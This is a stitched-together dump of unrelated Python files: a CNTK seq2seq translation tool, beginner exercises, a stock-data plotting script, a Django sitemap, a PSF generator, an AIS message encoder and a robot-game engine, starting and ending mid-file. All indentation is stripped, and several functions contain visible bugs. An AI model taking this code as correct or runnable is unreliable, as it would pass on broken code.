TEST_FILE and VALIDATION_FILE WILL BE OPTIONAL, WITH OPTION TO AUTOMATICALLY CREATE THEM BASED ON PART OF THE TRAINING FILE
MORE INFORMATION ABOUT THE DATA FORMAT, FOR MANUAL FORMATTING (IF DESIRED BY USER), TO BE ADDED TO GETDATAHELP
'''
def __init__(self, model_name, model_save_path, training_data_path):
self.model_name = model_name
self.model_save_path = model_save_path
self.training_data_path = training_data_path
self.vocabulary = None
self.index2word = None
self.word2index = None
self.model = None
def GetHelp(self):
print("Help about using the SequenceToSequence module. If you want help with the file formats - call GetDataHelp\n\n")
print("This is the SequenceToSequence easy-to-use tool, using CNTK for everything under-the-hood.\nThe tool utilizes an LSTM architecture with embedding and attention, and learns to model one input text to another.\nPossible uses: Translation from language A to language B, from normal text to 18th century literary style, etc.")
print("\nHow to use the SequenceToSequence tool:\n1) Create a SequenceToSequence instance and provide it:\na) the model name (string), model save path (string) and training data path (string).\nFor example: model_name='my_model', model_save_path='c:/model/', training_data_path='c:/model/data'")
print("\n\n2) Call SetFileData and give it:\na) The names and extensions of your training, validation, testing and vocabulary files.\nFor example train_file='train.ctf', validation_file='validation.ctf', test_file='test.ctf', vocab_file='vocab.mapping'\nb) The size of your total vocabulary, including both input and target words, as well as symbols (like apostrophes) and sequence start and end markers.\nc) The input_marker and output_marker fields, and the sequence start and end markers. These are optional to set - the defaults are: input_marker='S0', output_marker='S1', start_marker='<s>', end_marker='</s>'.\nThese are the field markers of the source and target words, and start and end markers of a sequence's start and finish.")
print("\nNOTE: test_file and validation_file - the file names are mandatory, but if you don't have separate test and validation files, simply put the exactly same filename as your train_file in them")
print("\n\n3) Call SetModelVariables and give it:\nPer how many epochs to save the model, the learning rate, gradient clipping threshold, minibatch size, evaluation minibatch size, number of layers, hidden layers size, embedding dimensions, attention dimensions and length increase.\nAll these variables are optional - and have a pre-set default.\nThe defaults are: save_per_epochs=2, lr=0.005, grad_clip_thresh=2.3, minibatch_size=72, eval_minibatch_size=72, layer_count=2, hidden_dim=512, embedding_dim=200, attention_dim=128, length_increase=1.5")
print("\n\nNote: It is advised to leave the learning rate, gradient clipping threshold, embedding dimensions and attention dimensions, values as default. You have the option to tweak them as you like, but the default will work well.\nIt is also advised to not go overboard with the number of layers, since returns will be diminishing, while computational cost will skyrocket. Same with the hidden layer dimensions.")
print("\n\n4) Call InitiateModel. If you already have a trained model saved, call it with the variables loading_model = True and load_model_path = path to the model file you want to load. It has to include the file name and extension as well.\nIf you do not have a saved model, simply call InitiateModel without any variables (InitiateModel())")
print("\n\n5) Call TrainModel and give it the variables:\nepochs = the number of epochs to train on\nepoch_size = the size of each epoch, which is how many lines there are in your training ctf file. You can get this by just opening the .ctf file in an advanced text file reader, like notebook++, scrolling to the bottom, and seeing which line number the last line is./nNOTE: Future versions will obtain this information automatically.\nepoch_size_multiplier = is an OPTIONAL variable, it determines how much % of the epoch_size each epoch should train. It's default value is 1.0, for 100%\nNOTE: It is advised to only provide the variables epochs and epoch_size. Only provide epoch_size_multiplier if you have specific need for it")
print("\n The TrainModel will also save the model to the same folder where your .ctf and .mapping files are")
print("\n\n6) Optional - call EvaluateModel (EvaluateModel()) with no added variables. Do this if you want to evaluate the model on the test_file you provided")
print("\n\n7) Call TranslateFromFile - this method will translate your model. Give it the variables translate_path = the path, including file name with .txt extension (saved as UTF-8) of the .txt file you want the trained model to translate\nsave_translation_path = the path to the directory where you want to save the translated file\ntranslation_name = the name with which to save the translated file, without extension (the file is automatically saved as a .txt)")
def GetDataHelp(self):
print("To use the SequenceToSequence easy-to-use tool, your data has to be formatted in the correct way. The easiest way to format your data correctly is call the TextToCtf module from this library.")
print("\nInstantiate the TextToCtf module of the library, and call it's GetHelp function to get use information. It's super easy, and does all the work for you!")
def SetFileData(self, train_file, validation_file, test_file, vocabulary_file, input_marker='S0', output_marker='S1', start_marker='<s>', end_marker='</s>'):
self.train_file = train_file
self.validation_file = validation_file
self.test_file = test_file
self.vocabulary_file = vocabulary_file
# how many items are in the full vocabulary
# should both be the same if using same vocab file
self.vocab_size = None # CHANGED THIS FROM BEING MANUALLY INPUT TO BEING CALCULATED AUTOMATICALLY IN THE get_vocab FUNCTION
# FIX THIS IN THE HELP FILE
self.input_marker = input_marker
self.output_marker = output_marker
self.start_marker = start_marker
self.end_marker = end_marker
# Try to initiate dictionaries automatically without needing to call it
self.initiate_dictionaries()
def get_vocab(self, path):
vocab = [word.strip() for word in open(path, encoding='utf-8-sig').readlines()]
self.vocab_size = len(vocab)
i2w = { index:word for index,word in enumerate(vocab)}
w2i = { word:index for index,word in enumerate(vocab)}
return (vocab, i2w, w2i)
def initiate_dictionaries(self):
self.train_file = os.path.join(self.training_data_path, self.train_file)
self.validation_file = os.path.join(self.training_data_path, self.validation_file)
self.test_file = os.path.join(self.training_data_path, self.test_file)
self.vocabulary_file = os.path.join(self.training_data_path, self.vocabulary_file)
self.data_path = {
'validation': self.validation_file,
'training': self.train_file,
'testing': self.test_file,
'vocab_file': self.vocabulary_file,
}
self.vocabulary, self.index2word, self.word2index = self.get_vocab(self.data_path['vocab_file'])
self.input_vocab_dim = self.vocab_size
self.label_vocab_dim = self.vocab_size
def SetModelVariables(self, save_per_epochs=2, lr=0.001, grad_clip_thresh=2.3, layer_count=2, minibatch_size=72, eval_minibatch_size=72, hidden_dim=512, embedding_dim=200, attention_dim=128, length_increase=1.5):
self.lr = lr
self.layer_count = layer_count
self.hidden_dim = hidden_dim
self.embedding_dim = embedding_dim
self.length_increase = length_increase
self.attention_dim = attention_dim
self.minibatch_size = minibatch_size
self.grad_clip_thresh = grad_clip_thresh
self.save_per_epochs = save_per_epochs
self.eval_minibatch_size = eval_minibatch_size
# initiate sequences axes and indices
self.sequences_axes_and_indices()
def create_reader(self, path, is_training):
return C.io.MinibatchSource(C.io.CTFDeserializer(path, C.io.StreamDefs(
features = C.io.StreamDef(field=self.input_marker, shape=self.input_vocab_dim, is_sparse=True),
labels = C.io.StreamDef(field=self.output_marker, shape=self.label_vocab_dim, is_sparse=True)
)), randomize = is_training, max_sweeps = C.io.INFINITELY_REPEAT if is_training else 1)
def sequences_axes_and_indices(self):
self.sentence_start = C.constant(np.array([w==self.start_marker for w in self.vocabulary], dtype = np.float32))
self.sentence_end_index = self.vocabulary.index(self.end_marker)
input_axis = C.Axis('input_axis')
label_axis = C.Axis('label_axis')
self.input_sequence = C.layers.SequenceOver[input_axis]
self.label_sequence = C.layers.SequenceOver[label_axis]
def create_model(self):
embed = C.layers.Embedding(self.embedding_dim, name='embed')
with C.layers.default_options(enable_self_stabilization=True, go_backwards=False):
LastRecurrence = C.layers.Recurrence
encode = C.layers.Sequential([embed, C.layers.Stabilizer(), C.layers.For(range(self.layer_count-1), lambda: C.layers.Recurrence(C.layers.LSTM(self.hidden_dim))), LastRecurrence(C.layers.LSTM(self.hidden_dim), return_full_state = True), (C.layers.Label('encoded_h'), C.layers.Label('encoded_c')), ])
with C.layers.default_options(enable_self_stabilization = True):
stab_in = C.layers.Stabilizer()
rec_blocks = [C.layers.LSTM(self.hidden_dim) for i in range(self.layer_count)]
stab_out = C.layers.Stabilizer()
proj_out = C.layers.Dense(self.label_vocab_dim, name='out_proj')
attention_model = C.layers.AttentionModel(attention_dim=self.attention_dim, name='attention_model')
@C.Function
def decode(history, input):
encoded_input = encode(input)
r = history
r = embed(r)
r = stab_in(r)
for i in range(self.layer_count):
rec_block = rec_blocks[i]
if i == 0:
@C.Function
def lstm_with_attention(dh, dc, x):
h_att = attention_model(encoded_input.outputs[0], dh)
x = C.splice(x, h_att)
return rec_block(dh, dc, x)
r = C.layers.Recurrence(lstm_with_attention)(r)
else:
r = C.layers.Recurrence(rec_block)(r)
r = stab_out(r)
r = proj_out(r)
r = C.layers.Label('out_proj_r')(r)
return r
return decode
def create_model_train(self, s2smodel):
@C.Function
def model_train(input, labels):
past_labels = C.layers.Delay(initial_state = self.sentence_start)(labels)
return (s2smodel(past_labels, input))
return (model_train)
def create_model_greedy(self, s2smodel):
@C.Function
@C.layers.Signature(self.input_sequence[C.layers.Tensor[self.input_vocab_dim]])
def model_greedy(input):
unfold = C.layers.UnfoldFrom(lambda history: s2smodel(history, input) >> C.hardmax, until_predicate = lambda w: w[..., self.sentence_end_index], length_increase = self.length_increase)
return unfold(initial_state = self.sentence_start, dynamic_axes_like = input)
return model_greedy
def create_criterion_function(self, model):
@C.Function
@C.layers.Signature(input=self.input_sequence[C.layers.Tensor[self.input_vocab_dim]], labels=self.label_sequence[C.layers.Tensor[self.label_vocab_dim]])
def criterion(input, labels):
postprocessed_labels = C.sequence.slice(labels, 1, 0)
z = model(input, postprocessed_labels)
ce = C.cross_entropy_with_softmax(z, postprocessed_labels)
errs = C.classification_error(z, postprocessed_labels)
return (ce, errs)
return criterion
def get_lines_count(self):
with open(self.data_path['training'], encoding='utf-8-sig') as file:
for index, line in enumerate(file):
pass
return index + 1
def create_sparse_to_dense(self, input_vocab_dim):
I = C.Constant(np.eye(input_vocab_dim))
@C.Function
@C.layers.Signature(self.input_sequence[C.layers.SparseTensor[input_vocab_dim]])
def no_op(input):
return C.times(input, I)
return no_op
def format_sequences(self, sequences, index2word):
return[" ".join([index2word[np.argmax(word)] for word in sequences]) for sequence in sequences]
def train(self, train_reader, validation_reader, vocabulary, index2word, s2smodel, max_epochs, epoch_size):
model_train = self.create_model_train(s2smodel)
criterion = self.create_criterion_function(model_train)
model_greedy = self.create_model_greedy(s2smodel)
lr = self.lr
learner = C.fsadagrad(model_train.parameters, lr = C.learning_rate_schedule([lr]*2+[lr/2]*3+[lr/4], C.UnitType.sample, epoch_size), momentum = C.momentum_as_time_constant_schedule(1100), gradient_clipping_threshold_per_sample=self.grad_clip_thresh, gradient_clipping_with_truncation=True)
trainer = C.Trainer(None, criterion, learner)
total_samples = 0
mbs = 0
eval_freq = 100
C.logging.log_number_of_parameters(model_train); print()
progress_printer = C.logging.ProgressPrinter(freq=30, tag='Training')
sparse_to_dense=self.create_sparse_to_dense(self.input_vocab_dim)
run_count = 0
for epoch in range(max_epochs):
while total_samples < (epoch+1) * epoch_size:
mb_train = train_reader.next_minibatch(self.minibatch_size)
trainer.train_minibatch({criterion.arguments[0]: mb_train[train_reader.streams.features], criterion.arguments[1]: mb_train[train_reader.streams.labels]})
progress_printer.update_with_trainer(trainer, with_metric=True)
if mbs % eval_freq == 0:
mb_valid = validation_reader.next_minibatch(1)
e = model_greedy(mb_valid[validation_reader.streams.features])
print(self.format_sequences(sparse_to_dense(mb_valid[validation_reader.streams.features]), index2word))
print('->')
print(self.format_sequences(e, index2word))
total_samples += mb_train[train_reader.streams.labels].num_samples
mbs += 1
if epoch % self.save_per_epochs == 0:
run_count += 1
model_save_name = '%s.cmf' %self.model_name
model_path = os.path.join(self.model_save_path, model_save_name)
print("Saving model to %s" %model_path)
s2smodel.save(model_path)
progress_printer.epoch_summary(with_metric=True)
model_save_name = '%s_trained_%d_epochs.cmf' %(self.model_name, max_epochs)
model_path = os.path.join(self.model_save_path, model_save_name)
print("Saving final model to %s" %model_path)
s2smodel.save(model_path)
print("%d epochs complete" %max_epochs)
# ADD TO HELP FUNCTION
def InitiateModel(self, loading_model=False, load_model_path=None):
self.loading_model = loading_model
self.load_model_path = load_model_path
if loading_model == True:
if not os.path.exists(self.load_model_path):
print("The path %s does not exist. Cannot load model from path.\nInitializing new model." %self.load_model_path)
self.model = self.create_model()
else:
self.model = C.Function.load(self.load_model_path)
else:
self.model = self.create_model()
#return model
# ADD TO HELP FUNCTION
def TrainModel(self, epochs, epoch_size=0, epoch_size_multiplier=1.0):
train_reader = self.create_reader(self.data_path['training'],True)
validation_reader = self.create_reader(self.data_path['validation'],True)
self.epochs = epochs
if epoch_size != 0:
self.epoch_size = int(epoch_size*epoch_size_multiplier)
else:
self.epoch_size = self.get_lines_count()
self.train(train_reader, validation_reader, self.vocabulary, self.index2word, self.model, self.epochs, self.epoch_size)
def create_test_reader(self):
test_reader = self.create_reader(self.data_path['testing'], False)
return test_reader
def evaluate_decoding(self, reader, s2smodel, index2word):
model_decoding = self.create_model_greedy(s2smodel)
progress_printer = C.logging.ProgressPrinter(tag='Evaluation')
sparse_to_dense = self.create_sparse_to_dense(self.input_vocab_dim)
minibatch_size = self.eval_minibatch_size
num_total = 0
num_wrong = 0
while True:
mb = reader.next_minibatch(minibatch_size)
if not mb:
break
evaluate = model_decoding(mb[reader.streams.features])
outputs = self.format_sequences(evaluate, index2word)
labels = self.format_sequences(sparse_to_dense(mb[reader.streams.labels]), index2word)
mrkr = '%s ' %self.start_marker
outputs = [mrkr + output for output in outputs]
for s in range(len(labels)):
for w in range(len(labels[s])):
num_total += 1
if w < len(outputs[s]):
if outputs[s][w] != labels[s][w]:
num_wrong += 1
rate = num_wrong / num_total
print("Error rate is {:.2f}% out of a total {}.".format((100 * rate / num_total), num_total))
return rate
def EvaluateModel(self):
tr = self.create_test_reader()
self.evaluate_decoding(tr, self.model, self.index2word)
### GOTTA MAKE IT SO THAT TRANSLATION SEPARATES SENTENCES RATHER THAN TAKING THEM ALL AT ONCE
def translate(self, tokens, model_decoding, vocabulary, index2word):
vdict = {v:i for i,v in enumerate(vocabulary)}
'''print(vdict)
for word in tokens:
print(word)
for c in tokens:
print(vdict[c])'''
try:
w = [vdict[self.start_marker]] + [vdict[c] for c in tokens] + [vdict[self.end_marker]]
except:
print("Input contains an unexpected token.")
return[]
query = C.Value.one_hot([w], len(vdict))
pred = model_decoding(query)
pred = pred[0]
prediction = np.argmax(pred, axis=-1)
translation = [index2word[i] for i in prediction]
return translation
def prep_translation_data(self, path):
non_symbols = ["'",'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'] # this is a constant list
symbols_replace = ['”', '“', "it's", "i'm", "they're", "what're", "he's", "she's", "you're","we're","isn't", "aren't", "wasn't", "weren't", "don't","doesn't","didn't","i've", "we've", "haven't", "you've", "hadn't", "can't", "couldn't", "mustn't", "shan't", "shouldn't", "we'll", "they'll", "i'll", "we'd", "you'd","i'd","he'd","she'd","it'd","we'd","they'd","let's"] # this is a constant list
symbols_replace_with = ['"', '"', "it is", "i am", "they are", "what are", "he is", "she is", "you are", "we are", "is not", "are not", "was not", "were not", "do not", "does not", "did not", "i have", "we have", "have not", "you have", "had not", "can not", "could not", "must not", "shall not", "should not", "we will", "they will", "i will", "we would", "you would", "i would", "he would", "she would", "it would", "we would", "they would", "let us"]
# the following several functions will either be converted to a single class, or restructured into the code
def txt_to_tokens(filepath):
txt = open(filepath, 'r', encoding='utf-8-sig')
words = txt.read().lower().split()
return words
def split_n_flatten(words_list):
# split all words & symbols (creates list of lists)
for index in range(len(words_list)):
words_list[index] = words_list[index].split()
# flatten list of lists
words_list = [word for sublist in words_list for word in sublist]
return words_list
def prep_tokens(path):
words = txt_to_tokens(path)
# space out all symbols from words
for index in range(len(words)):
new_word = ''
for character in words[index]:
if character not in non_symbols:
new_c = ''.join([' ',character,' '])
new_word = new_word + new_c
else:
new_word = new_word + character
words[index] = new_word
# split & flatten
words = split_n_flatten(words)
# adding bos to the beginning of the string. only used in prep-to-ctf or prep for training
# words.insert(0, target_bos)
# replace repleables
for index in range(len(words)):
if words[index] in symbols_replace:
words[index] = symbols_replace_with[symbols_replace.index(words[index])]
# split & flatten
words = split_n_flatten(words)
# ALL TOKENS SHOULD NOW BE PRE-PROCESSED
return words
words = prep_tokens(path)
return words
def save_translated_sequence(self, path, data, trans_name):
file_path = os.path.join(path, trans_name)
trans_file = open(file_path, 'w', encoding='utf-8-sig')
for word in data:
trans_file.write(word)
trans_file.write(' ')
trans_file.close()
print("Translation saved to %s." %path)
def TranslateFromFile(self, translate_path, save_translation_path, translation_name='translation'):
translation_name = '%s.txt' %translation_name
if not os.path.exists(translate_path):
print("File path %s does not exist.")
else:
if self.model == None:
print("Model is not initiated. Please call InitiateModel function first to initiate the model.")
else:
model_decoding = self.create_model_greedy(self.model)
out_data = []
trans_data = self.prep_translation_data(translate_path)
print(trans_data)
out_tokens = self.translate(trans_data, model_decoding, self.vocabulary, self.index2word)
out_data.extend(out_tokens)
out_data = ["." if tok==self.end_marker else tok[0:] for tok in out_data]
self.save_translated_sequence(save_translation_path, out_data, translation_name)
sys.stdout.flush()
''' #This function will break every word into it's letters. But I don't want it (yet) coz I want it to be a word 2 word model.
for word in trans_data:
#takes words and breaks into letters, and lower cases them
#in_tokens = [c.lower() for c in word]
out_tokens =... '''
|
'''
Crie uma tupla preenchida com os 20 primeiros colocados da Tabela do Campeonato
Brasileiro de Futebol, na ordem de colocação. Depois mostre:
A) Apenas os 5 primeiros colocados.
B) Os últimos 4 colocados da tabela.
C) Uma lista com os times em ordem alfabética.
D) Em que posição na tabela está o time da Chapecoense.
'''
times = ('Flamengo', 'Santos', 'Palmeiras', 'Grêmio', 'Athletico Paranaense',
'São Paulo', 'Internacional', 'Corinthians', 'Fortaleza', 'Goiás',
'Bahia', 'Vasco da Gama', 'Atlético', 'Fluminense', 'Botafogo', 'Ceará',
'Cruzeiro', 'Csa', 'Chapecoense', 'Avaí')
print('5 primeiros colocados:')
print(times[:5])
print('\n4 últimos colocados:')
print(times[16:])#ou times[-4]
print('\nTimes em Ordem Alfabética:')
print(sorted(times))
print(f'\nA Chapecoense está na {times.index("Chapecoense") + 1}ª posição')
|
# =============================================================================
# Import OHLCV data and perform basic visualizations
# Author : Mayank Rasu
# Please report bug/issues in the Q&A section
# =============================================================================
# Import necesary libraries
import pandas as pd
import pandas_datareader.data as pdr
import datetime
import matplotlib.pyplot as plt
# Download historical data for required stocks
tickers = ["MSFT","AMZN","AAPL","CSCO","IBM","FB"]
close_prices = pd.DataFrame() # dataframe to store close price of each ticker
attempt = 0 # initializing passthrough variable
drop = [] # initializing list to store tickerList whose close price was successfully extracted
while len(tickers) != 0 and attempt <= 5:
tickers = [j for j in tickers if j not in drop] # removing stocks whose data has been extracted from the ticker list
for i in range(len(tickers)):
try:
temp = pdr.get_data_yahoo(tickers[i],datetime.date.today()-datetime.timedelta(3650),datetime.date.today())
temp.dropna(inplace = True)
close_prices[tickers[i]] = temp["Adj Close"]
drop.append(tickers[i])
except:
print(tickers[i]," :failed to fetch data...retrying")
continue
attempt+=1
# Handling NaN Values
close_prices.fillna(method='bfill',axis=0,inplace=True) # Replaces NaN values with the next valid value along the column
daily_return = close_prices.pct_change() # Creates dataframe with daily return for each stock
# Data vizualization
close_prices.plot() # Plot of all the stocks superimposed on the same chart
cp_standardized = (close_prices - close_prices.mean())/close_prices.std() # Standardization
cp_standardized.plot() # Plot of all the stocks standardized and superimposed on the same chart
close_prices.plot(subplots=True, layout = (3,2), title = "Tech Stock Price Evolution", grid =True) # Subplots of the stocks
# Pyplot demo
fig, ax = plt.subplots()
plt.style.available
plt.style.use('ggplot')
ax.set(title="Daily return on tech stocks", xlabel="Tech Stocks", ylabel = "Daily Returns")
plt.bar(daily_return.columns,daily_return.mean())
|
from django.contrib.sitemaps import Sitemap
from .models import NursingHome
def update_sitemap(sitemap_dict):
sitemap_dict.update({
'nursinghomes-nursinghome': NursingHomeSitemap,
})
return sitemap_dict
class NursingHomeSitemap(Sitemap):
priority = 0.25
changefreq = 'yearly'
def items(self):
"""
Return published entries.
"""
return NursingHome.objects.all()
|
#!/usr/bin/env python3
""" Copyright © 2020 Borys Olifirov
Generating PSF estimation by two models,
Richards-Wolf's (PSF library)
and Gibson-Lanni (flowdec library, module gila.py)
"""
import sys
import logging
import numpy as np
import psf
import gila
def psfRiWo(setting, ems=False):
""" Calculate Richards-Wolf PSF model
return PSF as numpy array, values was normalised from 0 to 1
"""
args = {'shape': (256, 256), # number of samples in z and r direction
'dims': (5.0, 5.0), # size in z and r direction in micrometers
'ex_wavelen': 488.0,
'em_wavelen': 520.0,
'num_aperture': 1.2,
'refr_index': 1.333,
'magnification': 1.0,
'pinhole_radius': 0.05,
'pinhole_shape': 'square'}
args.update(setting)
if ems:
em_psf = psf.PSF(psf.ISOTROPIC| psf.EMISSION, **args)
args.update({'empsf': em_psf})
confocal_psf = psf.PSF(psf.ISOTROPIC | psf.CONFOCAL, **args)
return confocal_psf.volume()
def psfGiLa(setting):
""" Calculate Gibson-Lanni PSF model
require gila.py module
return PSF as numpy array, values was normalised from 0 to 1
"""
args = {'size_x': 128,
'size_y': 128,
'size_z': 128,
'num_basis': 100, # Number of rescaled Bessels that approximate the phase function
'num_samples': 1000, # Number of pupil samples along radial direction
'oversampling': 2, # Defines the upsampling ratio on the image space grid for computations
'NA': 0.9,
'wavelength': 0.512, # microns
'M': 60, # magnification
'ns': 1.33, # specimen refractive index (RI)
'ng0': 1.5, # coverslip RI design value
'ng': 1.5, # coverslip RI experimental value
'ni0': 1.33, # immersion medium RI design value
'ni': 1.33, # immersion medium RI experimental value
'ti0': 150, # microns, working distance (immersion medium thickness) design value
'tg0' :170, # microns, coverslip thickness design value
'tg': 170, # microns, coverslip thickness experimental value
'res_lateral': 0.1, # microns
'res_axial': 0.1, # microns
'pZ': 2, # microns, particle distance from coverslip
'min_wavelength': 0.488} # scaling factors for the Fourier-Bessel series expansion, microns
args.update(setting)
return gila.generate(args)
if __name__=="__main__":
pass
# That's all!
|
#!/usr/bin/env python
__author__ = 'Kurt Schwehr'
__version__ = '$Revision: 4799 $'.split()[1]
__revision__ = __version__ # For pylint
__date__ = '$Date: 2006-09-25 11:09:02 -0400 (Mon, 25 Sep 2006) $'.split()[1]
__copyright__ = '2008'
__license__ = 'Apache 2.0'
__doc__ ='''
Output python code for BBM encode and decode for a particular binary message
@requires: U{Python<http://python.org/>} >= 2.5
@requires: U{epydoc<http://epydoc.sourceforge.net/>} >= 3.0.1
@since: 2008-Mar-30
@status: under development
@see: IEC-PAS 61162-100 Ed. 1 Page 19: BBM - AIS Broadcast Binary Message
'''
import sys
import os
import StringIO
import ais.nmea
def create(payload,fill_bits=0,prefix='xx',seq_msg_id=0, msg_type=8,ais_chan='A'):
'''
>>> create('FstG8N6Kw<3<P6P1=87l0@',fill_bits=4,prefix='EC')
'!ECBBM,1,1,0,A,8,FstG8N6Kw<3<P6P1=87l0@,4*7A'
'''
assert msg_type in (8,) #(8,14)
# FIX: handle msg 14
assert seq_msg_id >= 0 and seq_msg_id < 10
assert ais_chan in 'AB'
assert len(payload) <= 58 # FIX: handle messages with more than 348 bits
assert fill_bits>=0 and fill_bits<=5
p = ['!'+prefix+'BBM',]
p.append('1') # total sentences - FIX: handle multiline BBM messages
p.append('1') # sentence number - FIX: handle multiline BBM messages
p.append(str(seq_msg_id))
p.append(ais_chan)
p.append(str(msg_type))
p.append(payload)
p.append(str(fill_bits)+'*')
s = ','.join(p)
s+=ais.nmea.checksumStr(s)
return s
def do_doctest(verbose=False):
'''
@return: success
@rtype: bool
'''
success = True
print os.path.basename(sys.argv[0]), 'doctests ...',
argv_orig = sys.argv
sys.argv = [sys.argv[0]]
if verbose:
sys.argv.append('-v')
import doctest
numfail, numtests = doctest.testmod()
if numfail == 0:
print 'ok numtests:', numtests
else:
print 'FAILED', numfail, 'tests out of', numtests
success = False
sys.argv = argv_orig # Restore the original args
return success
def main():
'''
FIX: document main
'''
from optparse import OptionParser
parser = OptionParser(usage="%prog [options]",
version="%prog "+__version__+' ('+__date__+')')
parser.add_option('--doc-test', dest='doctest', default=False, action='store_true',
help='run the documentation tests')
parser.add_option('-v', '--verbose', dest='verbose', default=False, action='store_true',
help='run the tests run in verbose mode')
(options, args) = parser.parse_args()
if options.doctest:
if not do_doctest(options.verbose):
sys.exit('Something Failed')
if __name__ == '__main__':
main()
|
#8.1
def count_words(input_str):
return len(input_str.split())
print(count_words('This is a string'))
#8.2
demo_str = 'Hello world'
print(count_words(demo_str))
#8.3
def find_min(num_list):
min_item = num_list[0]
for num in num_list:
if min_item >= num:
min_item = num
return(min_item)
print(find_min([1,2,3,4]))
#8.4
demo_list = [1,2,3,4,5,6]
print(find_min(demo_list))
#8.5
mix_list = [1,2,3,4,'a',5,6]
print(find_min(mix_list))
|
import ast
import inspect
import random
import sys
import traceback
import imp
###
from robotexception import *
from settings import settings
import rg
def init_settings(map_file):
global settings
map_data = ast.literal_eval(open(map_file).read())
settings.spawn_coords = map_data['spawn']
settings.obstacles = map_data['obstacle']
rg.set_settings(settings)
class DefaultRobot:
def act(self, game):
return ['guard']
class Player:
def __init__(self, code=None, robot=None):
if code is not None:
self._robot = None
self._mod = imp.new_module('usercode%d' % id(self))
exec code in self._mod.__dict__
elif robot is not None:
self._robot = robot
else:
raise Exception('you need to provide code or a module')
def get_usercode_obj(self, class_name, default):
if hasattr(self._mod, class_name):
if inspect.isclass(getattr(self._mod, class_name)):
return getattr(self._mod, class_name)()
return default()
def get_robot(self):
if self._robot is not None:
return self._robot
self._robot = self.get_usercode_obj('Robot', DefaultRobot)
return self._robot
class InternalRobot:
def __init__(self, location, hp, player_id, field):
self.location = location
self.hp = hp
self.player_id = player_id
self.field = field
@staticmethod
def parse_command(action):
return (action[0], action[1:])
def issue_command(self, action, actions):
cmd, params = InternalRobot.parse_command(action)
if cmd == 'move' or cmd == 'attack':
getattr(self, 'call_' + cmd)(params[0], actions)
if cmd == 'suicide':
self.call_suicide(actions)
def get_robots_around(self, loc):
locs_around = rg.locs_around(loc, filter_out=['obstacle', 'invalid'])
locs_around.append(loc)
robots = [self.field[x] for x in locs_around]
return [x for x in robots if x is not None]
def movable_loc(self, loc):
good_around = rg.locs_around(self.location,
filter_out=['invalid', 'obstacle'])
return loc in good_around
def can_act(self, loc, action_table, no_raise=False, move_stack=None):
global settings
if move_stack is not None and self in move_stack:
return self == move_stack[0]
if not self.movable_loc(loc):
return False
moving = []
nearby_robots = self.get_robots_around(loc)
for robot in nearby_robots:
if robot == self:
continue
cmd, params = InternalRobot.parse_command(action_table[robot])
if cmd == 'suicide' and robot.location == loc:
continue
if cmd == 'guard' and robot.location == loc:
if no_raise:
return False
raise UnitGuardCollision(robot)
if cmd == 'attack' and robot.location == loc:
if no_raise:
return False
raise UnitBlockCollision(robot)
if cmd == 'move':
if params[0] == loc:
moving.append(robot)
elif robot.location == loc:
if move_stack is None:
move_stack = [self]
move_stack.append(robot)
if not robot.can_act(params[0], action_table, True, move_stack):
if no_raise:
return False
raise UnitBlockCollision(robot)
if len(moving) > 0:
if no_raise:
return False
raise UnitMoveCollision(moving)
return True
def call_move(self, loc, action_table):
global settings
try:
if self.can_act(loc, action_table):
self.location = loc
except UnitGuardCollision as e:
if e.other_robot.player_id != self.player_id:
self.hp -= settings.collision_damage
except UnitMoveCollision as e:
for robot in e.other_robots:
if robot.player_id != self.player_id:
robot.hp -= settings.collision_damage
except UnitBlockCollision as e:
if e.other_robot.player_id != self.player_id:
self.hp -= settings.collision_damage
e.other_robot.hp -= settings.collision_damage
except RobotException:
pass
def call_attack(self, loc, action_table, damage=None):
if damage is None:
damage = random.randint(*settings.attack_range)
try:
self.can_act(loc, action_table)
except UnitGuardCollision as e:
if e.other_robot.player_id != self.player_id:
e.other_robot.hp -= int(damage / 2)
except UnitMoveCollision as e:
for robot in e.other_robots:
if robot.player_id != self.player_id:
robot.hp -= damage
except UnitBlockCollision as e:
if e.other_robot.player_id != self.player_id:
e.other_robot.hp -= int(damage)
except RobotException:
pass
def call_suicide(self, action_table):
self.hp = 0
self.call_attack(self.location, action_table, damage=settings.suicide_damage)
for loc in rg.locs_around(self.location):
self.call_attack(loc, action_table, damage=settings.suicide_damage)
@staticmethod
def is_valid_action(action):
global settings
cmd, params = InternalRobot.parse_command(action)
return cmd in settings.valid_commands
# just to make things easier
class Field:
def __init__(self, size):
self.field = [[None for x in range(size)] for y in range(size)]
def __getitem__(self, point):
return self.field[point[1]][point[0]]
def __setitem__(self, point, v):
self.field[point[1]][point[0]] = v
class Game:
def __init__(self, player1, player2, record_turns=False):
self._players = (player1, player2)
self.turns = 0
self._robots = []
self._field = Field(settings.board_size)
self._record = record_turns
if self._record:
self.history = [[] for i in range(2)]
def build_game_info(self):
global settings
return {
'robots': dict((
y.location,
dict((x, getattr(y, x)) for x in settings.exposed_properties)
) for y in self._robots),
'turn': self.turns,
}
def notify_new_turn(self):
for player_id in range(2):
user_robot = self._players[player_id].get_robot()
if hasattr(user_robot, 'on_new_turn'):
if inspect.ismethod(user_robot.on_new_turn):
user_robot.on_new_turn()
def make_robots_act(self):
global settings
game_info = self.build_game_info()
actions = {}
for robot in self._robots:
user_robot = self._players[robot.player_id].get_robot()
for prop in settings.exposed_properties:
setattr(user_robot, prop, getattr(robot, prop))
try:
next_action = user_robot.act(game_info)
if not InternalRobot.is_valid_action(next_action):
raise Exception('%s is not a valid action' % str(next_action))
except Exception:
print "The robot at (%s, %s) raised an exception:" % robot.location
print '-' * 60
traceback.print_exc(file=sys.stdout)
print '-' * 60
next_action = ['guard']
actions[robot] = next_action
for robot, action in actions.iteritems():
old_loc = robot.location
robot.issue_command(action, actions)
if robot.location != old_loc:
self._field[old_loc] = None
self._field[robot.location] = robot
def robot_at_loc(self, loc):
robot = self._field[loc]
return robot.player_id if robot else None
def spawn_robot(self, player_id, loc):
if self.robot_at_loc(loc) is not None:
return False
robot = InternalRobot(loc, settings.robot_hp, player_id, self._field)
self._robots.append(robot)
self._field[loc] = robot
def spawn_robot_batch(self):
global settings
locs = random.sample(settings.spawn_coords, settings.spawn_per_player * 2)
for player_id in range(2):
for i in range(settings.spawn_per_player):
self.spawn_robot(player_id, locs.pop())
def clear_spawn_points(self):
for loc in settings.spawn_coords:
if self._field[loc] is not None:
self._robots.remove(self._field[loc])
self._field[loc] = None
def remove_dead(self):
to_remove = [x for x in self._robots if x.hp <= 0]
for robot in to_remove:
self._robots.remove(robot)
if self._field[robot.location] == robot:
self._field[robot.location] = None
def make_history(self):
